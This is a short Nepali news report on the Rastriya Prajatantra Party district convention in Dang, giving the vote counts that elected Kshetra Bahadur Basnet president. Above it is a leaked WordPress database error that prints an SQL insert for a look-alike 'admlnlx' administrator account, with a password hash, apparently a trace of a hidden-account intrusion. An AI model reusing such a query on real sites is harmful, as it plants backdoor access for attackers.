WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bkv3Dj5Xpe4nl8rTI2q3eRPsRkTauk0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 15:58:28', '', 'admlnlx', 'admlnlx')
दाङ, माघ २७-
राष्ट्रिय प्रजातन्त्र पार्टी (राप्रपा) को जिल्ला अधिवेशनबाट क्षेत्रबहादुर बस्नेत अध्यक्ष पदमा विजयी भएका छन्। उनी ९७ मत प्राप्त गर्दै विजयी भएको निर्वाचन संयोजक तेजबहादुर बस्नेतले जानकारी दिए।
पार्टीको जिल्ला नेतृत्वका लागि प्रेमबहादुर शाह र विनोद केसी पनि चुनावी प्रतिपर्धामा थिए क्षेत्रबहादुरका निकटतम प्रतिस्पर्धी प्रेमबहादुर शाहले ५५ र विनोद केसीले २६ मत प्राप्त गरेको निर्वाचन अधिकृत घनश्याम थापाले जानकारी दिए। दाङमा राप्रपाका १ सय ९५ मतदाता छन्। निर्वाचन कमिटीका अनुसार घोराहीस्थित कर्मचारी मिलन केन्द्रमा भएको मतदानमा १ सय ८८ मत खसेको थियो। खसेको मतमध्ये ९ मत बदर भएको निर्वाचन समितिका संयोजक तेजबहादुर बस्नेतले बताए।